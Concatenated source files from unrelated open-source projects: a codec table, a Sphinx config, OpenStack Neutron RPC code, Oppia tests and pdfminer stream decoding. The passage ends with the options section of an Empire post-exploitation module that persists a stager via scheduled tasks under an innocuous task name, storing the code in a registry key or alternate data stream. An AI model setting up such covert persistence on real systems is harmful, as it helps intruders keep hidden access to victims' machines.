0x2510: 0x00bf, # BOX DRAWINGS LIGHT DOWN AND LEFT
0x2514: 0x00c0, # BOX DRAWINGS LIGHT UP AND RIGHT
0x2518: 0x00d9, # BOX DRAWINGS LIGHT UP AND LEFT
0x251c: 0x00c3, # BOX DRAWINGS LIGHT VERTICAL AND RIGHT
0x2524: 0x00b4, # BOX DRAWINGS LIGHT VERTICAL AND LEFT
0x252c: 0x00c2, # BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
0x2534: 0x00c1, # BOX DRAWINGS LIGHT UP AND HORIZONTAL
0x253c: 0x00c5, # BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
0x2550: 0x00cd, # BOX DRAWINGS DOUBLE HORIZONTAL
0x2551: 0x00ba, # BOX DRAWINGS DOUBLE VERTICAL
0x2552: 0x00d5, # BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
0x2553: 0x00d6, # BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
0x2554: 0x00c9, # BOX DRAWINGS DOUBLE DOWN AND RIGHT
0x2555: 0x00b8, # BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
0x2556: 0x00b7, # BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
0x2557: 0x00bb, # BOX DRAWINGS DOUBLE DOWN AND LEFT
0x2558: 0x00d4, # BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
0x2559: 0x00d3, # BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
0x255a: 0x00c8, # BOX DRAWINGS DOUBLE UP AND RIGHT
0x255b: 0x00be, # BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
0x255c: 0x00bd, # BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
0x255d: 0x00bc, # BOX DRAWINGS DOUBLE UP AND LEFT
0x255e: 0x00c6, # BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
0x255f: 0x00c7, # BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
0x2560: 0x00cc, # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
0x2561: 0x00b5, # BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
0x2562: 0x00b6, # BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
0x2563: 0x00b9, # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
0x2564: 0x00d1, # BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
0x2565: 0x00d2, # BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
0x2566: 0x00cb, # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
0x2567: 0x00cf, # BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
0x2568: 0x00d0, # BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
0x2569: 0x00ca, # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
0x256a: 0x00d8, # BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
0x256b: 0x00d7, # BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
0x256c: 0x00ce, # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
0x2580: 0x00df, # UPPER HALF BLOCK
0x2584: 0x00dc, # LOWER HALF BLOCK
0x2588: 0x00db, # FULL BLOCK
0x258c: 0x00dd, # LEFT HALF BLOCK
0x2590: 0x00de, # RIGHT HALF BLOCK
0x2591: 0x00b0, # LIGHT SHADE
0x2592: 0x00b1, # MEDIUM SHADE
0x2593: 0x00b2, # DARK SHADE
0x25a0: 0x00fe, # BLACK SQUARE
}
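# Quick consistency check of the two tables (codecs is already imported):
#
#   assert codecs.charmap_decode(b'\x82', 'strict', decoding_table)[0] == '\xe9'
#   assert codecs.charmap_encode('\xe9', 'strict', encoding_map)[0] == b'\x82'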
| apache-2.0 |
yamcs/yamcs | docs/http-api/conf.py | 3 | 3605 | # -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
import os
import sys
from xml.etree import ElementTree as ET
import pkg_resources
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../_ext'))
# Read the current Yamcs version from the Maven pom.xml
tree = ET.ElementTree()
if os.path.exists('../../pom.xml'):
tree.parse('../../pom.xml') # conf.py is used from its normal location
elif os.path.exists('../../../pom.xml'):
tree.parse('../../../pom.xml') # conf.py is used from within _auto/
yamcs_version_el = tree.getroot().find('{http://maven.apache.org/POM/4.0.0}version')
project = u'Yamcs'
copyright = u'2019, Space Applications Services'
author = u'Yamcs Team'
# The short X.Y version
version = yamcs_version_el.text
# The full version, including alpha/beta/rc tags
release = version
extensions = [
'sphinx.ext.extlinks',
'sphinxcontrib.fulltoc',
'proto',
]
# Add any paths that contain templates here, relative to this directory.
#templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path .
exclude_patterns = [u'_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
extlinks = {
'source': ('https://github.com/yamcs/yamcs/blob/master/%s', ''),
}
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'nature'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
'sidebarwidth': '300px',
}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['_static']
html_show_sourcelink = False
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
'papersize': 'a4paper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
    'preamble': r'\setcounter{tocdepth}{2}',
# Latex figure (float) alignment
#
'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'yamcs-http-api.tex', 'Yamcs HTTP API', 'Space Applications Services', 'manual'),
]
latex_show_pagerefs = True
latex_show_urls = 'footnote'
| agpl-3.0 |
uni2u/neutron | neutron/common/rpc.py | 2 | 8756 | # Copyright (c) 2012 OpenStack Foundation.
# Copyright (c) 2014 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo.config import cfg
from oslo import messaging
from oslo.messaging import serializer as om_serializer
from neutron.common import exceptions
from neutron.common import log
from neutron import context
from neutron.openstack.common import log as logging
from neutron.openstack.common import service
LOG = logging.getLogger(__name__)
TRANSPORT = None
NOTIFIER = None
ALLOWED_EXMODS = [
exceptions.__name__,
]
EXTRA_EXMODS = []
TRANSPORT_ALIASES = {
'neutron.openstack.common.rpc.impl_fake': 'fake',
'neutron.openstack.common.rpc.impl_qpid': 'qpid',
'neutron.openstack.common.rpc.impl_kombu': 'rabbit',
'neutron.openstack.common.rpc.impl_zmq': 'zmq',
'neutron.rpc.impl_fake': 'fake',
'neutron.rpc.impl_qpid': 'qpid',
'neutron.rpc.impl_kombu': 'rabbit',
'neutron.rpc.impl_zmq': 'zmq',
}
def init(conf):
global TRANSPORT, NOTIFIER
exmods = get_allowed_exmods()
TRANSPORT = messaging.get_transport(conf,
allowed_remote_exmods=exmods,
aliases=TRANSPORT_ALIASES)
serializer = RequestContextSerializer()
NOTIFIER = messaging.Notifier(TRANSPORT, serializer=serializer)
def cleanup():
global TRANSPORT, NOTIFIER
assert TRANSPORT is not None
assert NOTIFIER is not None
TRANSPORT.cleanup()
TRANSPORT = NOTIFIER = None
def add_extra_exmods(*args):
EXTRA_EXMODS.extend(args)
def clear_extra_exmods():
del EXTRA_EXMODS[:]
def get_allowed_exmods():
return ALLOWED_EXMODS + EXTRA_EXMODS
def get_client(target, version_cap=None, serializer=None):
assert TRANSPORT is not None
serializer = RequestContextSerializer(serializer)
return messaging.RPCClient(TRANSPORT,
target,
version_cap=version_cap,
serializer=serializer)
def get_server(target, endpoints, serializer=None):
assert TRANSPORT is not None
serializer = RequestContextSerializer(serializer)
return messaging.get_rpc_server(TRANSPORT, target, endpoints,
'eventlet', serializer)
def get_notifier(service=None, host=None, publisher_id=None):
assert NOTIFIER is not None
if not publisher_id:
publisher_id = "%s.%s" % (service, host or cfg.CONF.host)
return NOTIFIER.prepare(publisher_id=publisher_id)
class RequestContextSerializer(om_serializer.Serializer):
"""This serializer is used to convert RPC common context into
Neutron Context.
"""
def __init__(self, base=None):
super(RequestContextSerializer, self).__init__()
self._base = base
def serialize_entity(self, ctxt, entity):
if not self._base:
return entity
return self._base.serialize_entity(ctxt, entity)
def deserialize_entity(self, ctxt, entity):
if not self._base:
return entity
return self._base.deserialize_entity(ctxt, entity)
def serialize_context(self, ctxt):
return ctxt.to_dict()
def deserialize_context(self, ctxt):
rpc_ctxt_dict = ctxt.copy()
user_id = rpc_ctxt_dict.pop('user_id', None)
if not user_id:
user_id = rpc_ctxt_dict.pop('user', None)
tenant_id = rpc_ctxt_dict.pop('tenant_id', None)
if not tenant_id:
tenant_id = rpc_ctxt_dict.pop('project_id', None)
return context.Context(user_id, tenant_id,
load_admin_roles=False, **rpc_ctxt_dict)
class RpcProxy(object):
    '''
    Shim easing the migration from the oslo-incubator RPC layer to
    oslo.messaging: it emulates the old RpcProxy behaviour on top of the
    oslo.messaging API while callers are being ported.
    '''
RPC_API_NAMESPACE = None
def __init__(self, topic, default_version, version_cap=None):
super(RpcProxy, self).__init__()
self.topic = topic
target = messaging.Target(topic=topic, version=default_version)
self._client = get_client(target, version_cap=version_cap)
def make_msg(self, method, **kwargs):
return {'method': method,
'namespace': self.RPC_API_NAMESPACE,
'args': kwargs}
@log.log
def call(self, context, msg, **kwargs):
return self.__call_rpc_method(
context, msg, rpc_method='call', **kwargs)
@log.log
def cast(self, context, msg, **kwargs):
self.__call_rpc_method(context, msg, rpc_method='cast', **kwargs)
@log.log
def fanout_cast(self, context, msg, **kwargs):
kwargs['fanout'] = True
self.__call_rpc_method(context, msg, rpc_method='cast', **kwargs)
def __call_rpc_method(self, context, msg, **kwargs):
options = dict(
((opt, kwargs[opt])
for opt in ('fanout', 'timeout', 'topic', 'version')
if kwargs.get(opt))
)
if msg['namespace']:
options['namespace'] = msg['namespace']
if options:
callee = self._client.prepare(**options)
else:
callee = self._client
func = getattr(callee, kwargs['rpc_method'])
return func(context, msg['method'], **msg['args'])
class RpcCallback(object):
    '''
    Shim easing the migration from the oslo-incubator RPC layer to
    oslo.messaging: it pins the callback version on an oslo.messaging
    Target while callers are being ported.
    '''
RPC_API_VERSION = '1.0'
def __init__(self):
super(RpcCallback, self).__init__()
self.target = messaging.Target(version=self.RPC_API_VERSION)
class Service(service.Service):
"""Service object for binaries running on hosts.
A service enables rpc by listening to queues based on topic and host.
"""
def __init__(self, host, topic, manager=None, serializer=None):
super(Service, self).__init__()
self.host = host
self.topic = topic
self.serializer = serializer
if manager is None:
self.manager = self
else:
self.manager = manager
def start(self):
super(Service, self).start()
self.conn = create_connection(new=True)
LOG.debug("Creating Consumer connection for Service %s" %
self.topic)
endpoints = [self.manager]
# Share this same connection for these Consumers
self.conn.create_consumer(self.topic, endpoints, fanout=False)
node_topic = '%s.%s' % (self.topic, self.host)
self.conn.create_consumer(node_topic, endpoints, fanout=False)
self.conn.create_consumer(self.topic, endpoints, fanout=True)
# Hook to allow the manager to do other initializations after
# the rpc connection is created.
if callable(getattr(self.manager, 'initialize_service_hook', None)):
self.manager.initialize_service_hook(self)
# Consume from all consumers in threads
self.conn.consume_in_threads()
def stop(self):
# Try to shut the connection down, but if we get any sort of
# errors, go ahead and ignore them.. as we're shutting down anyway
try:
self.conn.close()
except Exception:
pass
super(Service, self).stop()
class Connection(object):
def __init__(self):
super(Connection, self).__init__()
self.servers = []
def create_consumer(self, topic, endpoints, fanout=False):
target = messaging.Target(
topic=topic, server=cfg.CONF.host, fanout=fanout)
server = get_server(target, endpoints)
self.servers.append(server)
def consume_in_threads(self):
for server in self.servers:
server.start()
return self.servers
# functions
def create_connection(new=True):
return Connection()
# exceptions
RPCException = messaging.MessagingException
RemoteError = messaging.RemoteError
MessagingTimeout = messaging.MessagingTimeout
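# --- Hedged usage sketch (comments only; requires loaded oslo.config options,
# and the topic name is illustrative) ---
# from neutron.common import rpc as n_rpc
# n_rpc.init(cfg.CONF)                      # builds TRANSPORT and NOTIFIER once
# target = messaging.Target(topic='q-plugin', version='1.0')
# client = n_rpc.get_client(target)         # wraps RequestContextSerializer
# # client.call(admin_context, 'some_method', arg='value')
# n_rpc.cleanup()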
| apache-2.0 |
DewarM/oppia | core/controllers/home_test.py | 2 | 10750 | # Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for the user notification dashboard and 'my explorations' pages."""
from core.domain import feedback_services
from core.domain import rights_manager
from core.domain import user_jobs_continuous
from core.tests import test_utils
import feconf
class HomePageTest(test_utils.GenericTestBase):
def test_logged_out_homepage(self):
"""Test the logged-out version of the home page."""
response = self.testapp.get('/')
self.assertEqual(response.status_int, 200)
response.mustcontain(
'Your personal tutor',
'Oppia - Gallery', 'About', 'Login', no=['Logout'])
def test_notifications_dashboard_redirects_for_logged_out_users(self):
"""Test the logged-out view of the notifications dashboard."""
response = self.testapp.get('/notifications_dashboard')
self.assertEqual(response.status_int, 302)
# This should redirect to the login page.
self.assertIn('signup', response.headers['location'])
self.assertIn('notifications_dashboard', response.headers['location'])
self.login('reader@example.com')
response = self.testapp.get('/notifications_dashboard')
# This should redirect the user to complete signup.
self.assertEqual(response.status_int, 302)
self.logout()
def test_logged_in_notifications_dashboard(self):
"""Test the logged-in view of the notifications dashboard."""
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.login(self.EDITOR_EMAIL)
response = self.testapp.get('/notifications_dashboard')
self.assertEqual(response.status_int, 200)
response.mustcontain(
'Notifications', 'Logout',
self.get_expected_logout_url('/'),
no=['Login', 'Your personal tutor',
self.get_expected_login_url('/')])
self.logout()
class MyExplorationsHandlerTest(test_utils.GenericTestBase):
MY_EXPLORATIONS_DATA_URL = '/myexplorationshandler/data'
COLLABORATOR_EMAIL = 'collaborator@example.com'
COLLABORATOR_USERNAME = 'collaborator'
EXP_ID = 'exp_id'
EXP_TITLE = 'Exploration title'
def setUp(self):
super(MyExplorationsHandlerTest, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(self.COLLABORATOR_EMAIL, self.COLLABORATOR_USERNAME)
self.signup(self.VIEWER_EMAIL, self.VIEWER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.collaborator_id = self.get_user_id_from_email(
self.COLLABORATOR_EMAIL)
self.viewer_id = self.get_user_id_from_email(self.VIEWER_EMAIL)
def test_no_explorations(self):
self.login(self.OWNER_EMAIL)
response = self.get_json(self.MY_EXPLORATIONS_DATA_URL)
self.assertEqual(response['explorations_list'], [])
self.logout()
def test_managers_can_see_explorations(self):
self.save_new_default_exploration(
self.EXP_ID, self.owner_id, title=self.EXP_TITLE)
self.set_admins([self.OWNER_EMAIL])
self.login(self.OWNER_EMAIL)
response = self.get_json(self.MY_EXPLORATIONS_DATA_URL)
self.assertEqual(len(response['explorations_list']), 1)
self.assertEqual(
response['explorations_list'][0]['status'],
rights_manager.ACTIVITY_STATUS_PRIVATE)
rights_manager.publish_exploration(self.owner_id, self.EXP_ID)
response = self.get_json(self.MY_EXPLORATIONS_DATA_URL)
self.assertEqual(len(response['explorations_list']), 1)
self.assertEqual(
response['explorations_list'][0]['status'],
rights_manager.ACTIVITY_STATUS_PUBLIC)
rights_manager.publicize_exploration(self.owner_id, self.EXP_ID)
response = self.get_json(self.MY_EXPLORATIONS_DATA_URL)
self.assertEqual(len(response['explorations_list']), 1)
self.assertEqual(
response['explorations_list'][0]['status'],
rights_manager.ACTIVITY_STATUS_PUBLICIZED)
self.logout()
def test_collaborators_can_see_explorations(self):
self.save_new_default_exploration(
self.EXP_ID, self.owner_id, title=self.EXP_TITLE)
rights_manager.assign_role_for_exploration(
self.owner_id, self.EXP_ID, self.collaborator_id,
rights_manager.ROLE_EDITOR)
self.set_admins([self.OWNER_EMAIL])
self.login(self.COLLABORATOR_EMAIL)
response = self.get_json(self.MY_EXPLORATIONS_DATA_URL)
self.assertEqual(len(response['explorations_list']), 1)
self.assertEqual(
response['explorations_list'][0]['status'],
rights_manager.ACTIVITY_STATUS_PRIVATE)
rights_manager.publish_exploration(self.owner_id, self.EXP_ID)
response = self.get_json(self.MY_EXPLORATIONS_DATA_URL)
self.assertEqual(len(response['explorations_list']), 1)
self.assertEqual(
response['explorations_list'][0]['status'],
rights_manager.ACTIVITY_STATUS_PUBLIC)
rights_manager.publicize_exploration(self.owner_id, self.EXP_ID)
response = self.get_json(self.MY_EXPLORATIONS_DATA_URL)
self.assertEqual(len(response['explorations_list']), 1)
self.assertEqual(
response['explorations_list'][0]['status'],
rights_manager.ACTIVITY_STATUS_PUBLICIZED)
self.logout()
def test_viewer_cannot_see_explorations(self):
self.save_new_default_exploration(
self.EXP_ID, self.owner_id, title=self.EXP_TITLE)
rights_manager.assign_role_for_exploration(
self.owner_id, self.EXP_ID, self.viewer_id,
rights_manager.ROLE_VIEWER)
self.set_admins([self.OWNER_EMAIL])
self.login(self.VIEWER_EMAIL)
response = self.get_json(self.MY_EXPLORATIONS_DATA_URL)
self.assertEqual(response['explorations_list'], [])
rights_manager.publish_exploration(self.owner_id, self.EXP_ID)
response = self.get_json(self.MY_EXPLORATIONS_DATA_URL)
self.assertEqual(response['explorations_list'], [])
rights_manager.publicize_exploration(self.owner_id, self.EXP_ID)
response = self.get_json(self.MY_EXPLORATIONS_DATA_URL)
self.assertEqual(response['explorations_list'], [])
self.logout()
def test_can_see_feedback_thread_counts(self):
self.save_new_default_exploration(
self.EXP_ID, self.owner_id, title=self.EXP_TITLE)
self.login(self.OWNER_EMAIL)
response = self.get_json(self.MY_EXPLORATIONS_DATA_URL)
self.assertEqual(len(response['explorations_list']), 1)
self.assertEqual(
response['explorations_list'][0]['num_open_threads'], 0)
self.assertEqual(
response['explorations_list'][0]['num_total_threads'], 0)
def mock_get_thread_analytics(unused_exploration_id):
return {
'num_open_threads': 2,
'num_total_threads': 3,
}
with self.swap(
feedback_services, 'get_thread_analytics',
mock_get_thread_analytics):
response = self.get_json(self.MY_EXPLORATIONS_DATA_URL)
self.assertEqual(len(response['explorations_list']), 1)
self.assertEqual(
response['explorations_list'][0]['num_open_threads'], 2)
self.assertEqual(
response['explorations_list'][0]['num_total_threads'], 3)
self.logout()
class NotificationsDashboardHandlerTest(test_utils.GenericTestBase):
DASHBOARD_DATA_URL = '/notificationsdashboardhandler/data'
def setUp(self):
super(NotificationsDashboardHandlerTest, self).setUp()
self.signup(self.VIEWER_EMAIL, self.VIEWER_USERNAME)
self.viewer_id = self.get_user_id_from_email(self.VIEWER_EMAIL)
def _get_recent_notifications_mock_by_viewer(self, unused_user_id):
"""Returns a single feedback thread by VIEWER_ID."""
return (100000, [{
'activity_id': 'exp_id',
'activity_title': 'exp_title',
'author_id': self.viewer_id,
'last_updated_ms': 100000,
'subject': 'Feedback Message Subject',
'type': feconf.UPDATE_TYPE_FEEDBACK_MESSAGE,
}])
def _get_recent_notifications_mock_by_anonymous_user(self, unused_user_id):
"""Returns a single feedback thread by an anonymous user."""
return (200000, [{
'activity_id': 'exp_id',
'activity_title': 'exp_title',
'author_id': None,
'last_updated_ms': 100000,
'subject': 'Feedback Message Subject',
'type': feconf.UPDATE_TYPE_FEEDBACK_MESSAGE,
}])
def test_author_ids_are_handled_correctly(self):
"""Test that author ids are converted into author usernames
and that anonymous authors are handled correctly.
"""
with self.swap(
user_jobs_continuous.DashboardRecentUpdatesAggregator,
'get_recent_notifications',
self._get_recent_notifications_mock_by_viewer):
self.login(self.VIEWER_EMAIL)
response = self.get_json(self.DASHBOARD_DATA_URL)
self.assertEqual(len(response['recent_notifications']), 1)
self.assertEqual(
response['recent_notifications'][0]['author_username'],
self.VIEWER_USERNAME)
self.assertNotIn('author_id', response['recent_notifications'][0])
with self.swap(
user_jobs_continuous.DashboardRecentUpdatesAggregator,
'get_recent_notifications',
self._get_recent_notifications_mock_by_anonymous_user):
self.login(self.VIEWER_EMAIL)
response = self.get_json(self.DASHBOARD_DATA_URL)
self.assertEqual(len(response['recent_notifications']), 1)
self.assertEqual(
response['recent_notifications'][0]['author_username'], '')
self.assertNotIn('author_id', response['recent_notifications'][0])
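# --- Hedged aside (not part of the original tests) ---
# self.swap(...) above temporarily replaces an attribute for the duration of a
# with block; a minimal stdlib-only equivalent of that pattern looks like:
import contextlib
@contextlib.contextmanager
def _swap(obj, attr, newvalue):
    """Swap obj.attr for newvalue inside a with block, then restore it."""
    original = getattr(obj, attr)
    setattr(obj, attr, newvalue)
    try:
        yield
    finally:
        setattr(obj, attr, original)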
| apache-2.0 |
Cashiuus/metagoofil | pdfminer/pdftypes.py | 26 | 7735 | #!/usr/bin/env python2
import sys
import zlib
from lzw import lzwdecode
from ascii85 import ascii85decode, asciihexdecode
from runlength import rldecode
from psparser import PSException, PSObject
from psparser import LIT, KWD, STRICT
LITERAL_CRYPT = LIT('Crypt')
# Abbreviations of filter names from the PDF Reference, section 4.8.6 "Inline Images"
LITERALS_FLATE_DECODE = (LIT('FlateDecode'), LIT('Fl'))
LITERALS_LZW_DECODE = (LIT('LZWDecode'), LIT('LZW'))
LITERALS_ASCII85_DECODE = (LIT('ASCII85Decode'), LIT('A85'))
LITERALS_ASCIIHEX_DECODE = (LIT('ASCIIHexDecode'), LIT('AHx'))
LITERALS_RUNLENGTH_DECODE = (LIT('RunLengthDecode'), LIT('RL'))
LITERALS_CCITTFAX_DECODE = (LIT('CCITTFaxDecode'), LIT('CCF'))
LITERALS_DCT_DECODE = (LIT('DCTDecode'), LIT('DCT'))
## PDF Objects
##
class PDFObject(PSObject): pass
class PDFException(PSException): pass
class PDFTypeError(PDFException): pass
class PDFValueError(PDFException): pass
class PDFNotImplementedError(PSException): pass
## PDFObjRef
##
class PDFObjRef(PDFObject):
def __init__(self, doc, objid, _):
if objid == 0:
if STRICT:
raise PDFValueError('PDF object id cannot be 0.')
self.doc = doc
self.objid = objid
#self.genno = genno # Never used.
return
def __repr__(self):
return '<PDFObjRef:%d>' % (self.objid)
def resolve(self):
return self.doc.getobj(self.objid)
# resolve
def resolve1(x):
"""Resolves an object.
If this is an array or dictionary, it may still contains
some indirect objects inside.
"""
while isinstance(x, PDFObjRef):
x = x.resolve()
return x
def resolve_all(x):
"""Recursively resolves the given object and all the internals.
Make sure there is no indirect reference within the nested object.
This procedure might be slow.
"""
while isinstance(x, PDFObjRef):
x = x.resolve()
if isinstance(x, list):
x = [ resolve_all(v) for v in x ]
elif isinstance(x, dict):
for (k,v) in x.iteritems():
x[k] = resolve_all(v)
return x
def decipher_all(decipher, objid, genno, x):
"""Recursively deciphers the given object.
"""
if isinstance(x, str):
return decipher(objid, genno, x)
if isinstance(x, list):
x = [ decipher_all(decipher, objid, genno, v) for v in x ]
elif isinstance(x, dict):
for (k,v) in x.iteritems():
x[k] = decipher_all(decipher, objid, genno, v)
return x
# Type checking
def int_value(x):
x = resolve1(x)
if not isinstance(x, int):
if STRICT:
raise PDFTypeError('Integer required: %r' % x)
return 0
return x
def float_value(x):
x = resolve1(x)
if not isinstance(x, float):
if STRICT:
raise PDFTypeError('Float required: %r' % x)
return 0.0
return x
def num_value(x):
x = resolve1(x)
if not (isinstance(x, int) or isinstance(x, float)):
if STRICT:
raise PDFTypeError('Int or Float required: %r' % x)
return 0
return x
def str_value(x):
x = resolve1(x)
if not isinstance(x, str):
if STRICT:
raise PDFTypeError('String required: %r' % x)
return ''
return x
def list_value(x):
x = resolve1(x)
if not (isinstance(x, list) or isinstance(x, tuple)):
if STRICT:
raise PDFTypeError('List required: %r' % x)
return []
return x
def dict_value(x):
x = resolve1(x)
if not isinstance(x, dict):
if STRICT:
raise PDFTypeError('Dict required: %r' % x)
return {}
return x
def stream_value(x):
x = resolve1(x)
if not isinstance(x, PDFStream):
if STRICT:
raise PDFTypeError('PDFStream required: %r' % x)
return PDFStream({}, '')
return x
## PDFStream type
##
class PDFStream(PDFObject):
def __init__(self, attrs, rawdata, decipher=None):
assert isinstance(attrs, dict)
self.attrs = attrs
self.rawdata = rawdata
self.decipher = decipher
self.data = None
self.objid = None
self.genno = None
return
def set_objid(self, objid, genno):
self.objid = objid
self.genno = genno
return
def __repr__(self):
if self.data is None:
assert self.rawdata is not None
return '<PDFStream(%r): raw=%d, %r>' % (self.objid, len(self.rawdata), self.attrs)
else:
assert self.data is not None
return '<PDFStream(%r): len=%d, %r>' % (self.objid, len(self.data), self.attrs)
def __contains__(self, name):
return name in self.attrs
def __getitem__(self, name):
return self.attrs[name]
def get(self, name, default=None):
return self.attrs.get(name, default)
def get_any(self, names, default=None):
for name in names:
if name in self.attrs:
return self.attrs[name]
return default
def get_filters(self):
filters = self.get_any(('F', 'Filter'))
if not filters: return []
if isinstance(filters, list): return filters
return [ filters ]
def decode(self):
        assert self.data is None and self.rawdata is not None
data = self.rawdata
if self.decipher:
# Handle encryption
data = self.decipher(self.objid, self.genno, data)
filters = self.get_filters()
if not filters:
self.data = data
self.rawdata = None
return
for f in filters:
if f in LITERALS_FLATE_DECODE:
# will get errors if the document is encrypted.
try:
data = zlib.decompress(data)
except zlib.error:
data = ''
elif f in LITERALS_LZW_DECODE:
data = lzwdecode(data)
elif f in LITERALS_ASCII85_DECODE:
data = ascii85decode(data)
elif f in LITERALS_ASCIIHEX_DECODE:
data = asciihexdecode(data)
elif f in LITERALS_RUNLENGTH_DECODE:
data = rldecode(data)
elif f in LITERALS_CCITTFAX_DECODE:
#data = ccittfaxdecode(data)
raise PDFNotImplementedError('Unsupported filter: %r' % f)
elif f == LITERAL_CRYPT:
# not yet..
raise PDFNotImplementedError('/Crypt filter is unsupported')
else:
raise PDFNotImplementedError('Unsupported filter: %r' % f)
# apply predictors
params = self.get_any(('DP', 'DecodeParms', 'FDecodeParms'), {})
if 'Predictor' in params and 'Columns' in params:
pred = int_value(params['Predictor'])
columns = int_value(params['Columns'])
if pred:
if pred != 12:
raise PDFNotImplementedError('Unsupported predictor: %r' % pred)
buf = ''
ent0 = '\x00' * columns
for i in xrange(0, len(data), columns+1):
pred = data[i]
ent1 = data[i+1:i+1+columns]
if pred == '\x02':
ent1 = ''.join( chr((ord(a)+ord(b)) & 255) for (a,b) in zip(ent0,ent1) )
buf += ent1
ent0 = ent1
data = buf
self.data = data
self.rawdata = None
return
def get_data(self):
if self.data is None:
self.decode()
return self.data
def get_rawdata(self):
return self.rawdata
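# --- Hedged usage sketch (illustrative; relies on psparser interning literals
# so that LIT('FlateDecode') compares equal to the table entries above) ---
def _demo_flate_roundtrip():
    """Build a FlateDecode stream by hand and let decode() inflate it."""
    raw = zlib.compress('hello pdf')
    stream = PDFStream({'Filter': LIT('FlateDecode'), 'Length': len(raw)}, raw)
    return stream.get_data()  # -> 'hello pdf'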
| gpl-2.0 |
pasv/Empire | lib/modules/persistence/userland/schtasks.py | 13 | 9540 | import os
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-Schtasks',
'Author': ['@mattifestation', '@harmj0y'],
'Description': ('Persist a stager (or script) using schtasks. This has a moderate detection/removal rating.'),
'Background' : False,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : False,
'MinPSVersion' : '2',
'Comments': [
'https://github.com/mattifestation/PowerSploit/blob/master/Persistence/Persistence.psm1'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : False,
'Value' : ''
},
'DailyTime' : {
'Description' : 'Daily time to trigger the script (HH:mm).',
'Required' : False,
'Value' : '09:00'
},
'IdleTime' : {
'Description' : 'User idle time (in minutes) to trigger script.',
'Required' : False,
'Value' : ''
},
'TaskName' : {
'Description' : 'Name to use for the schtask.',
'Required' : True,
'Value' : 'Updater'
},
'RegPath' : {
'Description' : 'Registry location to store the script code. Last element is the key name.',
'Required' : False,
'Value' : 'HKCU:\Software\Microsoft\Windows\CurrentVersion\debug'
},
'ADSPath' : {
'Description' : 'Alternate-data-stream location to store the script code.',
'Required' : False,
'Value' : ''
},
